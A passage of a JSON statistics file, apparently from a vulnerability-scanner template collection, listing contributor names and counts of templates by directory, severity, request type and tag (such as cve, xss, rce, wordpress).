nematzadeh","count":1},{"name":"amnotacat","count":1},{"name":"un-fmunozs","count":1},{"name":"f1she3","count":1},{"name":"tehtbl","count":1},{"name":"h4kux","count":1},{"name":"nielsing","count":1},{"name":"soyelmago","count":1},{"name":"clment cruchet","count":1},{"name":"shivampand3y","count":1},{"name":"notsoevilweasel","count":1},{"name":"b4uh0lz","count":1},{"name":"osamahamad","count":1},{"name":"luqman","count":1},{"name":"push4d","count":1},{"name":"izn0u","count":1},{"name":"calumjelrick","count":1},{"name":"prettyboyaaditya","count":1},{"name":"b0rn2r00t","count":1},{"name":"0ut0fb4nd","count":1},{"name":"lark lab","count":1},{"name":"0xceba","count":1},{"name":"_harleo","count":1},{"name":"remonsec","count":1},{"name":"ransomsec","count":1},{"name":"p-l-","count":1},{"name":"rotembar","count":1},{"name":"tirtha_mandal","count":1},{"name":"absshax","count":1},{"name":"arm!tage","count":1},{"name":"berkdusunur","count":1},{"name":"kaizensecurity","count":1},{"name":"jbertman","count":1},{"name":"x6263","count":1},{"name":"pudsec","count":1},{"name":"mantissts","count":1},{"name":"andirrahmani1","count":1},{"name":"_c0wb0y_","count":1},{"name":"petruknisme","count":1},{"name":"blckraven","count":1},{"name":"c3l3si4n","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dhiyaneshdki","count":1},{"name":"cookiehanhoan","count":1},{"name":"danigoland","count":1},{"name":"willd96","count":1},{"name":"lrtk-coder","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"failopen","count":1},{"name":"couskito","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"andysvints","count":1},{"name":"noobexploiter","count":1},{"name":"lixts","count":1},{"name":"yashanand155","count":1},{"name":"daviey","count":1},{"name":"shiar","count":1},{"name":"vinit989","count":1},{"name":"arjunchandarana","count":1},{"name":"aresx","count":1},{"name":"rubina119","count":1},{"name":"elder tao","count":1},{"name":"undefl0w","count":1},{"name":"bywalks","count":1},{"name":"elouhi","count":1},{"name":"dawid-czarnecki","count":1},{"name":"_darrenmartyn","count":1},{"name":"manuelbua","count":1},{"name":"daffianfo","count":1}],"directory":[{"name":"cves","count":1516},{"name":"exposed-panels","count":757},{"name":"vulnerabilities","count":518},{"name":"misconfiguration","count":350},{"name":"technologies","count":311},{"name":"exposures","count":301},{"name":"token-spray","count":235},{"name":"workflows","count":190},{"name":"default-logins","count":114},{"name":"file","count":78},{"name":"takeovers","count":68},{"name":"network","count":59},{"name":"iot","count":41},{"name":"miscellaneous","count":25},{"name":"cnvd","count":25},{"name":"dns","count":17},{"name":"fuzzing","count":12},{"name":"ssl","count":8},{"name":"headless","count":7}],"severity":[{"name":"info","count":1631},{"name":"high","count":1141},{"name":"medium","count":829},{"name":"critical","count":546},{"name":"low","count":269},{"name":"unknown","count":25}],"types":[{"name":"http","count":4257},{"name":"file","count":78},{"name":"network","count":73},{"name":"dns","count":17}]} +{"tags":[{"name":"cve","count":1551},{"name":"panel","count":778},{"name":"edb","count":582},{"name":"exposure","count":551},{"name":"xss","count":541},{"name":"lfi","count":519},{"name":"wordpress","count":470},{"name":"cve2021","count":369},{"name":"wp-plugin","count":365},{"name":"tech","count":357},{"name":"rce","count":347},{"name":"packetstorm","count":292},{"name":"cve2022","count":269},{"name":"wpscan","count":256},{"name":"token-spray","count":236},{"name":"misconfig","count":228},{"name":"cve2020","count":222},{"name":"","count":195},{"name":"unauth","count":194},{"name":"wp","count":187},{"name":"kev","count":168},{"name":"config","count":167},{"name":"cve2018","count":145},{"name":"cve2019","count":137},{"name":"joomla","count":135},{"name":"default-login","count":133},{"name":"apache","count":127},{"name":"oast","count":127},{"name":"iot","count":125},{"name":"authenticated","count":120},{"name":"sqli","count":118},{"name":"cve2010","count":111},{"name":"router","count":92},{"name":"files","count":92},{"name":"redirect","count":90},{"name":"login","count":89},{"name":"network","count":81},{"name":"devops","count":75},{"name":"takeover","count":75},{"name":"token","count":74},{"name":"ssrf","count":72},{"name":"cve2017","count":70},{"name":"cms","count":67},{"name":"auth-bypass","count":66},{"name":"file","count":65},{"name":"oracle","count":63},{"name":"intrusive","count":60},{"name":"install","count":59},{"name":"disclosure","count":57},{"name":"seclists","count":57},{"name":"oss","count":52},{"name":"cisco","count":50},{"name":"cve2016","count":49},{"name":"google","count":48},{"name":"fileupload","count":47},{"name":"cve2015","count":47},{"name":"adobe","count":45},{"name":"aem","count":42},{"name":"cve2014","count":41},{"name":"plugin","count":41},{"name":"atlassian","count":38},{"name":"vmware","count":38},{"name":"vulhub","count":38},{"name":"logs","count":38},{"name":"debug","count":37},{"name":"hackerone","count":37},{"name":"tenable","count":36},{"name":"traversal","count":35},{"name":"springboot","count":35},{"name":"injection","count":34},{"name":"jira","count":32},{"name":"listing","count":31},{"name":"huntr","count":31},{"name":"kubernetes","count":30},{"name":"generic","count":28},{"name":"dns","count":27},{"name":"log4j","count":26},{"name":"microsoft","count":25},{"name":"sap","count":25},{"name":"cnvd","count":25},{"name":"aws","count":23},{"name":"misc","count":23},{"name":"proxy","count":23},{"name":"jndi","count":23},{"name":"fuzz","count":22},{"name":"php","count":22},{"name":"wp-theme","count":21},{"name":"manageengine","count":21},{"name":"zoho","count":21},{"name":"cve2012","count":21},{"name":"api","count":20},{"name":"weblogic","count":20},{"name":"cloud","count":20},{"name":"k8s","count":19},{"name":"cicd","count":19},{"name":"ibm","count":19},{"name":"camera","count":19},{"name":"deserialization","count":19},{"name":"tomcat","count":19},{"name":"gitlab","count":18},{"name":"dlink","count":18},{"name":"struts","count":17},{"name":"jenkins","count":17},{"name":"service","count":17},{"name":"wavlink","count":17},{"name":"firewall","count":17},{"name":"printer","count":16},{"name":"ftp","count":16},{"name":"cve2011","count":15},{"name":"cve2009","count":15},{"name":"xxe","count":15},{"name":"nginx","count":15},{"name":"java","count":14},{"name":"fortinet","count":14},{"name":"android","count":14},{"name":"hp","count":14},{"name":"domainmod","count":14},{"name":"lfr","count":13},{"name":"confluence","count":13},{"name":"cve2008","count":13},{"name":"abstractapi","count":13},{"name":"woocommerce","count":13},{"name":"cve2013","count":13},{"name":"magento","count":13},{"name":"msf","count":13},{"name":"amazon","count":13},{"name":"status","count":13},{"name":"microweber","count":12},{"name":"ruijie","count":12},{"name":"github","count":12},{"name":"netsweeper","count":12},{"name":"backup","count":12},{"name":"drupal","count":12},{"name":"vpn","count":12},{"name":"graphql","count":12},{"name":"rails","count":12},{"name":"netgear","count":12},{"name":"webserver","count":11},{"name":"airflow","count":11},{"name":"fortigate","count":11},{"name":"azure","count":11},{"name":"backdoor","count":11},{"name":"mail","count":11},{"name":"ssl","count":11},{"name":"zyxel","count":11},{"name":"cisa","count":11},{"name":"cnvd2021","count":11},{"name":"django","count":10},{"name":"ruby","count":10},{"name":"glpi","count":10},{"name":"spring","count":10},{"name":"jolokia","count":10},{"name":"git","count":10},{"name":"dell","count":10},{"name":"coldfusion","count":10},{"name":"grafana","count":10},{"name":"laravel","count":10},{"name":"sonicwall","count":9},{"name":"wso2","count":9},{"name":"kube","count":9},{"name":"fastjson","count":9},{"name":"dedecms","count":9},{"name":"ssh","count":9},{"name":"prometheus","count":9},{"name":"vcenter","count":9},{"name":"iis","count":9},{"name":"zabbix","count":9},{"name":"zimbra","count":9},{"name":"phpmyadmin","count":9},{"name":"ssti","count":9},{"name":"windows","count":9},{"name":"hms","count":8},{"name":"npm","count":8},{"name":"jboss","count":8},{"name":"audit","count":8},{"name":"solr","count":8},{"name":"solarview","count":8},{"name":"mirai","count":8},{"name":"jetbrains","count":8},{"name":"elasticsearch","count":8},{"name":"cisco-switch","count":8},{"name":"recon","count":8},{"name":"config-audit","count":8},{"name":"kafka","count":8},{"name":"metadata","count":8},{"name":"bucket","count":8},{"name":"citrix","count":8},{"name":"versa","count":8},{"name":"symfony","count":8},{"name":"scada","count":8},{"name":"headless","count":8},{"name":"auth","count":8},{"name":"maps","count":7},{"name":"blind","count":7},{"name":"detect","count":7},{"name":"exchange","count":7},{"name":"samsung","count":7},{"name":"docker","count":7},{"name":"druid","count":7},{"name":"seeyon","count":7},{"name":"ognl","count":7},{"name":"icewarp","count":7},{"name":"go","count":7},{"name":"opencats","count":7},{"name":"nodejs","count":7},{"name":"cnvd2020","count":7},{"name":"python","count":7},{"name":"firebase","count":7},{"name":"squirrelmail","count":7},{"name":"smtp","count":6},{"name":"ofbiz","count":6},{"name":"slack","count":6},{"name":"sitecore","count":6},{"name":"thinkphp","count":6},{"name":"crlf","count":6},{"name":"emerge","count":6},{"name":"liferay","count":6},{"name":"jetty","count":6},{"name":"cache","count":6},{"name":"zhiyuan","count":6},{"name":"enum","count":6},{"name":"lucee","count":6},{"name":"node","count":6},{"name":"cobbler","count":6},{"name":"bigip","count":6},{"name":"vms","count":6},{"name":"microstrategy","count":6},{"name":"bypass","count":6},{"name":"artica","count":6},{"name":"moodle","count":6},{"name":"opensis","count":6},{"name":"magmi","count":6},{"name":"jamf","count":6},{"name":"activemq","count":6},{"name":"fpd","count":6},{"name":"rconfig","count":6},{"name":"huawei","count":6},{"name":"openvpn","count":6},{"name":"ecology","count":6},{"name":"db","count":6},{"name":"setup","count":6},{"name":"admin","count":6},{"name":"kubelet","count":6},{"name":"elfinder","count":6},{"name":"websphere","count":6},{"name":"avideo","count":5},{"name":"apisix","count":5},{"name":"rfi","count":5},{"name":"scan","count":5},{"name":"carrental","count":5},{"name":"filemanager","count":5},{"name":"metinfo","count":5},{"name":"database","count":5},{"name":"redis","count":5},{"name":"gocd","count":5},{"name":"firmware","count":5},{"name":"s3","count":5},{"name":"cockpit","count":5},{"name":"rseenet","count":5},{"name":"nagios","count":5},{"name":"solarwinds","count":5},{"name":"minio","count":5},{"name":"leak","count":5},{"name":"fortios","count":5},{"name":"plesk","count":5},{"name":"circarlife","count":5},{"name":"parallels","count":5},{"name":"symantec","count":5},{"name":"error","count":5},{"name":"prestashop","count":5},{"name":"74cms","count":5},{"name":"storage","count":5},{"name":"strapi","count":5},{"name":"mongodb","count":5},{"name":"vbulletin","count":5},{"name":"alibaba","count":5},{"name":"elastic","count":5},{"name":"gogs","count":5},{"name":"awstats","count":5},{"name":"keycloak","count":5},{"name":"fatpipe","count":5},{"name":"linkerd","count":4},{"name":"caucho","count":4},{"name":"zte","count":4},{"name":"console","count":4},{"name":"terramaster","count":4},{"name":"horde","count":4},{"name":"dropbear","count":4},{"name":"umbraco","count":4},{"name":"sonarqube","count":4},{"name":"jellyfin","count":4},{"name":"hpe","count":4},{"name":"search","count":4},{"name":"panos","count":4},{"name":"rabbitmq","count":4},{"name":"puppet","count":4},{"name":"axigen","count":4},{"name":"gitea","count":4},{"name":"prtg","count":4},{"name":"cve2007","count":4},{"name":"hashicorp","count":4},{"name":"gnuboard","count":4},{"name":"sql","count":4},{"name":"aspose","count":4},{"name":"stripe","count":4},{"name":"mailchimp","count":4},{"name":"hybris","count":4},{"name":"yeswiki","count":4},{"name":"cacti","count":4},{"name":"springcloud","count":4},{"name":"thinkcmf","count":4},{"name":"resin","count":4},{"name":"kevinlab","count":4},{"name":"typo3","count":4},{"name":"xmlrpc","count":4},{"name":"hongdian","count":4},{"name":"ems","count":4},{"name":"openemr","count":4},{"name":"redmine","count":4},{"name":"asp","count":4},{"name":"adminer","count":4},{"name":"kentico","count":4},{"name":"kibana","count":4},{"name":"ampache","count":4},{"name":"royalevent","count":4},{"name":"paypal","count":4},{"name":"bmc","count":4},{"name":"roxy","count":4},{"name":"phpinfo","count":4},{"name":"telesquare","count":4},{"name":"sangfor","count":4},{"name":"telerik","count":4},{"name":"httpserver","count":4},{"name":"nosqli","count":4},{"name":"vrealize","count":4},{"name":"candidats","count":4},{"name":"oauth","count":4},{"name":"nexus","count":4},{"name":"tenda","count":4},{"name":"couchdb","count":4},{"name":"tikiwiki","count":4},{"name":"sophos","count":4},{"name":"voip","count":4},{"name":"wcs","count":4},{"name":"photo","count":4},{"name":"postmessage","count":4},{"name":"flink","count":4},{"name":"artifactory","count":4},{"name":"sendgrid","count":4},{"name":"phppgadmin","count":4},{"name":"hikvision","count":4},{"name":"hoteldruid","count":4},{"name":"oa","count":4},{"name":"cnvd2019","count":4},{"name":"beyondtrust","count":4},{"name":"yonyou","count":3},{"name":"steve","count":3},{"name":"messaging","count":3},{"name":"aptus","count":3},{"name":"payara","count":3},{"name":"linksys","count":3},{"name":"hsphere","count":3},{"name":"selea","count":3},{"name":"targa","count":3},{"name":"movable","count":3},{"name":"netdata","count":3},{"name":"openstack","count":3},{"name":"processwire","count":3},{"name":"atom","count":3},{"name":"teamcity","count":3},{"name":"buffalo","count":3},{"name":"weiphp","count":3},{"name":"zend","count":3},{"name":"glassfish","count":3},{"name":"dom","count":3},{"name":"sftp","count":3},{"name":"zeroshell","count":3},{"name":"cloudflare","count":3},{"name":"trixbox","count":3},{"name":"httpbin","count":3},{"name":"elementor","count":3},{"name":"kfm","count":3},{"name":"trendnet","count":3},{"name":"dotcms","count":3},{"name":"intercom","count":3},{"name":"httpd","count":3},{"name":"consul","count":3},{"name":"graph","count":3},{"name":"eshop","count":3},{"name":"kkfileview","count":3},{"name":"ivanti","count":3},{"name":"sentry","count":3},{"name":"pega","count":3},{"name":"epson","count":3},{"name":"mcafee","count":3},{"name":"openam","count":3},{"name":"square","count":3},{"name":"grav","count":3},{"name":"fileman","count":3},{"name":"nuuo","count":3},{"name":"drawio","count":3},{"name":"ebs","count":3},{"name":"panabit","count":3},{"name":"mikrotik","count":3},{"name":"mobileiron","count":3},{"name":"kingsoft","count":3},{"name":"avtech","count":3},{"name":"openfire","count":3},{"name":"ruckus","count":3},{"name":"superadmin","count":3},{"name":"ampps","count":3},{"name":"axis","count":3},{"name":"synology","count":3},{"name":"dreambox","count":3},{"name":"blockchain","count":3},{"name":"rlm","count":3},{"name":"clusterengine","count":3},{"name":"voipmonitor","count":3},{"name":"pentaho","count":3},{"name":"odoo","count":3},{"name":"codeigniter","count":3},{"name":"proftpd","count":3},{"name":"netlify","count":3},{"name":"bitbucket","count":3},{"name":"ec2","count":3},{"name":"digitalrebar","count":3},{"name":"lotus","count":3},{"name":"labkey","count":3},{"name":"nortek","count":3},{"name":"mongo","count":3},{"name":"axis2","count":3},{"name":"bruteforce","count":3},{"name":"facebook","count":3},{"name":"lansweeper","count":3},{"name":"webmin","count":3},{"name":"bitrix","count":3},{"name":"modem","count":3},{"name":"nacos","count":3},{"name":"pfsense","count":3},{"name":"smb","count":3},{"name":"jupyter","count":3},{"name":"goanywhere","count":3},{"name":"graylog","count":3},{"name":"heroku","count":3},{"name":"samba","count":3},{"name":"splunk","count":3},{"name":"mantisbt","count":3},{"name":"geoserver","count":3},{"name":"cve2005","count":3},{"name":"microfocus","count":3},{"name":"tableau","count":3},{"name":"mautic","count":3},{"name":"actuator","count":3},{"name":"unifi","count":3},{"name":"webmail","count":3},{"name":"sugarcrm","count":3},{"name":"pip","count":3},{"name":"centos","count":3},{"name":"octobercms","count":3},{"name":"r-seenet","count":3},{"name":"redash","count":3},{"name":"globalprotect","count":3},{"name":"servicenow","count":3},{"name":"selenium","count":3},{"name":"getsimple","count":3},{"name":"openbmcs","count":3},{"name":"empirecms","count":3},{"name":"digitalocean","count":3},{"name":"webadmin","count":3},{"name":"subrion","count":3},{"name":"3cx","count":3},{"name":"log","count":3},{"name":"dzzoffice","count":3},{"name":"wordfence","count":3},{"name":"seagate","count":3},{"name":"key","count":3},{"name":"flexvnf","count":3},{"name":"geowebserver","count":3},{"name":"sharepoint","count":3},{"name":"express","count":3},{"name":"thruk","count":3},{"name":"bigant","count":3},{"name":"fanruan","count":3},{"name":"fuelcms","count":3},{"name":"rocketchat","count":3},{"name":"telnet","count":3},{"name":"dolibarr","count":3},{"name":"jfrog","count":3},{"name":"harbor","count":3},{"name":"jeesns","count":3},{"name":"circleci","count":3},{"name":"qnap","count":3},{"name":"thinfinity","count":3},{"name":"metabase","count":3},{"name":"rackn","count":3},{"name":"ansible","count":3},{"name":"finecms","count":3},{"name":"concrete","count":3},{"name":"matrix","count":3},{"name":"twitter","count":2},{"name":"vscode","count":2},{"name":"aerohive","count":2},{"name":"postgres","count":2},{"name":"intellian","count":2},{"name":"rockmongo","count":2},{"name":"netis","count":2},{"name":"mida","count":2},{"name":"neos","count":2},{"name":"audiocodes","count":2},{"name":"adiscon","count":2},{"name":"tapestry","count":2},{"name":"horizon","count":2},{"name":"xceedium","count":2},{"name":"asus","count":2},{"name":"orchid","count":2},{"name":"linux","count":2},{"name":"seacms","count":2},{"name":"loytec","count":2},{"name":"commax","count":2},{"name":"fortimail","count":2},{"name":"pcoip","count":2},{"name":"alienvault","count":2},{"name":"sqlite","count":2},{"name":"nextjs","count":2},{"name":"openwrt","count":2},{"name":"aqua","count":2},{"name":"dotnet","count":2},{"name":"clansphere","count":2},{"name":"phpshowtime","count":2},{"name":"arcgis","count":2},{"name":"jeedom","count":2},{"name":"phpcollab","count":2},{"name":"showdoc","count":2},{"name":"avada","count":2},{"name":"gitlist","count":2},{"name":"flir","count":2},{"name":"xml","count":2},{"name":"virtua","count":2},{"name":"xenmobile","count":2},{"name":"scriptcase","count":2},{"name":"carel","count":2},{"name":"favicon","count":2},{"name":"gcp","count":2},{"name":"f5","count":2},{"name":"exacqvision","count":2},{"name":"jmx","count":2},{"name":"gitbook","count":2},{"name":"mybb","count":2},{"name":"ghost","count":2},{"name":"itop","count":2},{"name":"phpstorm","count":2},{"name":"pulse","count":2},{"name":"bigbluebutton","count":2},{"name":"cargo","count":2},{"name":"aruba","count":2},{"name":"redhat","count":2},{"name":"espeasy","count":2},{"name":"traefik","count":2},{"name":"password","count":2},{"name":"werkzeug","count":2},{"name":"owncloud","count":2},{"name":"contao","count":2},{"name":"wpqa","count":2},{"name":"yii","count":2},{"name":"idea","count":2},{"name":"metersphere","count":2},{"name":"linkedin","count":2},{"name":"watchguard","count":2},{"name":"ubnt","count":2},{"name":"uwsgi","count":2},{"name":"netsus","count":2},{"name":"upload","count":2},{"name":"kkFileView","count":2},{"name":"craftcms","count":2},{"name":"chiyu","count":2},{"name":"zerof","count":2},{"name":"atmail","count":2},{"name":"superset","count":2},{"name":"zzzcms","count":2},{"name":"kavita","count":2},{"name":"discourse","count":2},{"name":"jitsi","count":2},{"name":"newrelic","count":2},{"name":"zywall","count":2},{"name":"pbootcms","count":2},{"name":"virtualui","count":2},{"name":"glances","count":2},{"name":"opencpu","count":2},{"name":"webpagetest","count":2},{"name":"shenyu","count":2},{"name":"impresscms","count":2},{"name":"graphite","count":2},{"name":"ilo","count":2},{"name":"ovirt","count":2},{"name":"dotnetnuke","count":2},{"name":"apereo","count":2},{"name":"opsview","count":2},{"name":"accela","count":2},{"name":"frontpage","count":2},{"name":"chyrp","count":2},{"name":"hetzner","count":2},{"name":"pacsone","count":2},{"name":"corebos","count":2},{"name":"guacamole","count":2},{"name":"matomo","count":2},{"name":"netscaler","count":2},{"name":"dlp","count":2},{"name":"natshell","count":2},{"name":"sequoiadb","count":2},{"name":"rstudio","count":2},{"name":"erxes","count":2},{"name":"fortiweb","count":2},{"name":"javascript","count":2},{"name":"idrac","count":2},{"name":"cas","count":2},{"name":"plastic","count":2},{"name":"portal","count":2},{"name":"xiaomi","count":2},{"name":"auerswald","count":2},{"name":"nasos","count":2},{"name":"draytek","count":2},{"name":"eprints","count":2},{"name":"airtame","count":2},{"name":"cve2006","count":2},{"name":"kettle","count":2},{"name":"maian","count":2},{"name":"zzcms","count":2},{"name":"servicedesk","count":2},{"name":"xxljob","count":2},{"name":"eris","count":2},{"name":"myfactory","count":2},{"name":"ad","count":2},{"name":"imap","count":2},{"name":"rackstation","count":2},{"name":"livezilla","count":2},{"name":"terraform","count":2},{"name":"flatpress","count":2},{"name":"swagger","count":2},{"name":"cyberoam","count":2},{"name":"rancher","count":2},{"name":"akamai","count":2},{"name":"tileserver","count":2},{"name":"bitly","count":2},{"name":"kong","count":2},{"name":"wooyun","count":2},{"name":"homematic","count":2},{"name":"xoops","count":2},{"name":"default-page","count":2},{"name":"alfresco","count":2},{"name":"csrf","count":2},{"name":"backups","count":2},{"name":"pmb","count":2},{"name":"iptime","count":2},{"name":"listserv","count":2},{"name":"lighttpd","count":2},{"name":"highmail","count":2},{"name":"skycaiji","count":2},{"name":"sysaid","count":2},{"name":"gitblit","count":2},{"name":"ixcache","count":2},{"name":"rosariosis","count":2},{"name":"codemeter","count":2},{"name":"azkaban","count":2},{"name":"syslog","count":2},{"name":"overflow","count":2},{"name":"hospital","count":2},{"name":"idor","count":2},{"name":"openssh","count":2},{"name":"qcubed","count":2},{"name":"frp","count":2},{"name":"dos","count":2},{"name":"totemomail","count":2},{"name":"weather","count":2},{"name":"ldap","count":2},{"name":"sniplets","count":2},{"name":"lantronix","count":2},{"name":"circontrol","count":2},{"name":"gophish","count":2},{"name":"influxdb","count":2},{"name":"middleware","count":2},{"name":"gryphon","count":2},{"name":"forcepoint","count":2},{"name":"avaya","count":2},{"name":"ucmdb","count":2},{"name":"nuxeo","count":2},{"name":"owasp","count":2},{"name":"saltstack","count":2},{"name":"kiwitcms","count":2},{"name":"sas","count":2},{"name":"zblogphp","count":2},{"name":"dokuwiki","count":2},{"name":"couchbase","count":2},{"name":"webalizer","count":2},{"name":"sass","count":2},{"name":"unisharp","count":2},{"name":"blesta","count":2},{"name":"synopsys","count":2},{"name":"wuzhicms","count":2},{"name":"ranger","count":2},{"name":"aviatrix","count":2},{"name":"j2ee","count":2},{"name":"froxlor","count":2},{"name":"supermicro","count":2},{"name":"electron","count":2},{"name":"docs","count":2},{"name":"casdoor","count":2},{"name":"emqx","count":2},{"name":"landesk","count":2},{"name":"hostheader-injection","count":2},{"name":"teampass","count":2},{"name":"sidekiq","count":2},{"name":"etherpad","count":2},{"name":"gespage","count":2},{"name":"places","count":2},{"name":"webcam","count":2},{"name":"globaldomains","count":2},{"name":"dataiku","count":2},{"name":"osticket","count":2},{"name":"apple","count":2},{"name":"emby","count":2},{"name":"nextcloud","count":2},{"name":"clamav","count":2},{"name":"resourcespace","count":2},{"name":"reolink","count":2},{"name":"pgadmin","count":2},{"name":"temenos","count":2},{"name":"cocoon","count":2},{"name":"omnia","count":2},{"name":"waf","count":2},{"name":"oidc","count":2},{"name":"books","count":2},{"name":"wwbn","count":2},{"name":"yapi","count":2},{"name":"hadoop","count":2},{"name":"xampp","count":2},{"name":"seeddms","count":2},{"name":"secret","count":2},{"name":"testrail","count":2},{"name":"code42","count":2},{"name":"submitty","count":2},{"name":"eko","count":2},{"name":"piwigo","count":2},{"name":"eyesofnetwork","count":2},{"name":"tplink","count":2},{"name":"ametys","count":2},{"name":"projectsend","count":2},{"name":"opencart","count":2},{"name":"gradle","count":2},{"name":"sdwan","count":2},{"name":"chamilo","count":2},{"name":"jquery","count":2},{"name":"tornado","count":2},{"name":"viewpoint","count":2},{"name":"shellshock","count":2},{"name":"mbean","count":2},{"name":"avantfax","count":2},{"name":"apollo","count":2},{"name":"rundeck","count":2},{"name":"ericsson","count":2},{"name":"jsf","count":2},{"name":"allied","count":2},{"name":"sourcecodester","count":2},{"name":"dashboard","count":2},{"name":"domxss","count":2},{"name":"igs","count":2},{"name":"otobo","count":2},{"name":"embed","count":2},{"name":"vidyo","count":2},{"name":"dvr","count":2},{"name":"cassandra","count":2},{"name":"mysql","count":2},{"name":"zms","count":2},{"name":"nordex","count":2},{"name":"dbeaver","count":2},{"name":"akkadian","count":2},{"name":"wamp","count":2},{"name":"hubspot","count":2},{"name":"bash","count":2},{"name":"h3c","count":2},{"name":"ispy","count":2},{"name":"spark","count":2},{"name":"bomgar","count":2},{"name":"workspaceone","count":2},{"name":"xweb500","count":2},{"name":"wapples","count":2},{"name":"openresty","count":2},{"name":"veeam","count":2},{"name":"eventum","count":2},{"name":"vigorconnect","count":2},{"name":"pam","count":2},{"name":"javamelody","count":2},{"name":"dvwa","count":2},{"name":"mailgun","count":2},{"name":"octoprint","count":2},{"name":"wildfly","count":2},{"name":"tasmota","count":2},{"name":"novnc","count":2},{"name":"fiori","count":2},{"name":"forum","count":2},{"name":"angular","count":2},{"name":"seowon","count":2},{"name":"haproxy","count":2},{"name":"appcms","count":2},{"name":"xnat","count":2},{"name":"gateway","count":2},{"name":"cloudinary","count":2},{"name":"konga","count":2},{"name":"xerox","count":2},{"name":"node-red-dashboard","count":2},{"name":"inspur","count":2},{"name":"prestshop","count":2},{"name":"ecoa","count":2},{"name":"loqate","count":2},{"name":"tongda","count":2},{"name":"flightpath","count":2},{"name":"hiveos","count":2},{"name":"dubbo","count":2},{"name":"ambari","count":2},{"name":"fastcgi","count":2},{"name":"puppetdb","count":2},{"name":"hjtcloud","count":2},{"name":"netflix","count":2},{"name":"tidb","count":2},{"name":"ebook","count":2},{"name":"dynamicweb","count":2},{"name":"smartstore","count":2},{"name":"hasura","count":2},{"name":"qihang","count":2},{"name":"text","count":2},{"name":"kafdrop","count":2},{"name":"motorola","count":2},{"name":"acrolinx","count":2},{"name":"checkpoint","count":2},{"name":"pascom","count":2},{"name":"livehelperchat","count":2},{"name":"xsuite","count":2},{"name":"cgi","count":2},{"name":"conductor","count":2},{"name":"todoist","count":1},{"name":"karel","count":1},{"name":"sling","count":1},{"name":"surveysparrow","count":1},{"name":"infinitewp","count":1},{"name":"slocum","count":1},{"name":"wget","count":1},{"name":"qvidium","count":1},{"name":"aryanic","count":1},{"name":"gpon","count":1},{"name":"nagios-xi","count":1},{"name":"ictprotege","count":1},{"name":"daily-prayer-time-for-mosques","count":1},{"name":"soplanning","count":1},{"name":"musicstore","count":1},{"name":"delta","count":1},{"name":"bingmaps","count":1},{"name":"multisafepay","count":1},{"name":"nette","count":1},{"name":"abbott","count":1},{"name":"sofneta","count":1},{"name":"majordomo2","count":1},{"name":"calendarix","count":1},{"name":"jhipster","count":1},{"name":"workerman","count":1},{"name":"gallery","count":1},{"name":"extremenetworks","count":1},{"name":"realteo","count":1},{"name":"gateone","count":1},{"name":"dotclear","count":1},{"name":"supersign","count":1},{"name":"geniusocean","count":1},{"name":"fastvue","count":1},{"name":"rsvpmaker","count":1},{"name":"catfishcms","count":1},{"name":"springframework","count":1},{"name":"gerapy","count":1},{"name":"dribbble","count":1},{"name":"huemagic","count":1},{"name":"pichome","count":1},{"name":"h-sphere","count":1},{"name":"csa","count":1},{"name":"exolis","count":1},{"name":"vodafone","count":1},{"name":"opentsdb","count":1},{"name":"istat","count":1},{"name":"directorist","count":1},{"name":"ipanel","count":1},{"name":"stats","count":1},{"name":"wp-fundraising-donation","count":1},{"name":"ssi","count":1},{"name":"chronoforums","count":1},{"name":"saml","count":1},{"name":"browshot","count":1},{"name":"iq-block-country","count":1},{"name":"ipvpn","count":1},{"name":"encompass","count":1},{"name":"details","count":1},{"name":"qualcomm","count":1},{"name":"opengraphr","count":1},{"name":"scrutinizer","count":1},{"name":"dvdFab","count":1},{"name":"shopify","count":1},{"name":"codestats","count":1},{"name":"pdflayer","count":1},{"name":"version","count":1},{"name":"zookeeper","count":1},{"name":"opencast","count":1},{"name":"wiren","count":1},{"name":"liquibase","count":1},{"name":"ffserver","count":1},{"name":"alltube","count":1},{"name":"primetek","count":1},{"name":"qizhi","count":1},{"name":"phpldap","count":1},{"name":"mailmap","count":1},{"name":"sitemap","count":1},{"name":"siteomat","count":1},{"name":"liberty","count":1},{"name":"logitech","count":1},{"name":"pcoweb","count":1},{"name":"sensei-lms","count":1},{"name":"teradici","count":1},{"name":"synnefo","count":1},{"name":"tectuus","count":1},{"name":"blogengine","count":1},{"name":"buddy","count":1},{"name":"iucn","count":1},{"name":"fastpanel","count":1},{"name":"namedprocess","count":1},{"name":"gridx","count":1},{"name":"visualtools","count":1},{"name":"weboftrust","count":1},{"name":"nerdgraph","count":1},{"name":"smi","count":1},{"name":"hue","count":1},{"name":"cuteeditor","count":1},{"name":"mappress","count":1},{"name":"sarg","count":1},{"name":"buildbot","count":1},{"name":"hivequeue","count":1},{"name":"wondercms","count":1},{"name":"shindig","count":1},{"name":"rujjie","count":1},{"name":"neo4j","count":1},{"name":"prototype","count":1},{"name":"notebook","count":1},{"name":"notificationx","count":1},{"name":"sage","count":1},{"name":"wbcecms","count":1},{"name":"totaljs","count":1},{"name":"hanming","count":1},{"name":"buddypress","count":1},{"name":"mapbox","count":1},{"name":"autocomplete","count":1},{"name":"behat","count":1},{"name":"elmah","count":1},{"name":"appveyor","count":1},{"name":"jupyterhub","count":1},{"name":"kubeview","count":1},{"name":"mkdocs","count":1},{"name":"schneider","count":1},{"name":"macaddresslookup","count":1},{"name":"remedy","count":1},{"name":"securepoint","count":1},{"name":"spf","count":1},{"name":"rudloff","count":1},{"name":"global","count":1},{"name":"polarisft","count":1},{"name":"xmpp","count":1},{"name":"x-ray","count":1},{"name":"routeros","count":1},{"name":"chevereto","count":1},{"name":"achecker","count":1},{"name":"myanimelist","count":1},{"name":"solarlog","count":1},{"name":"yealink","count":1},{"name":"AlphaWeb","count":1},{"name":"clickup","count":1},{"name":"alumni","count":1},{"name":"api-manager","count":1},{"name":"ignition","count":1},{"name":"flickr","count":1},{"name":"wagtail","count":1},{"name":"suprema","count":1},{"name":"timeclock","count":1},{"name":"awin","count":1},{"name":"citybook","count":1},{"name":"moonpay","count":1},{"name":"gunicorn","count":1},{"name":"cloudera","count":1},{"name":"pagerduty","count":1},{"name":"scraperapi","count":1},{"name":"mdb","count":1},{"name":"server","count":1},{"name":"all-in-one-wp-migration","count":1},{"name":"domino","count":1},{"name":"editor","count":1},{"name":"luci","count":1},{"name":"goip","count":1},{"name":"pfblockerng","count":1},{"name":"kodi","count":1},{"name":"olivetti","count":1},{"name":"bullwark","count":1},{"name":"avalanche","count":1},{"name":"directions","count":1},{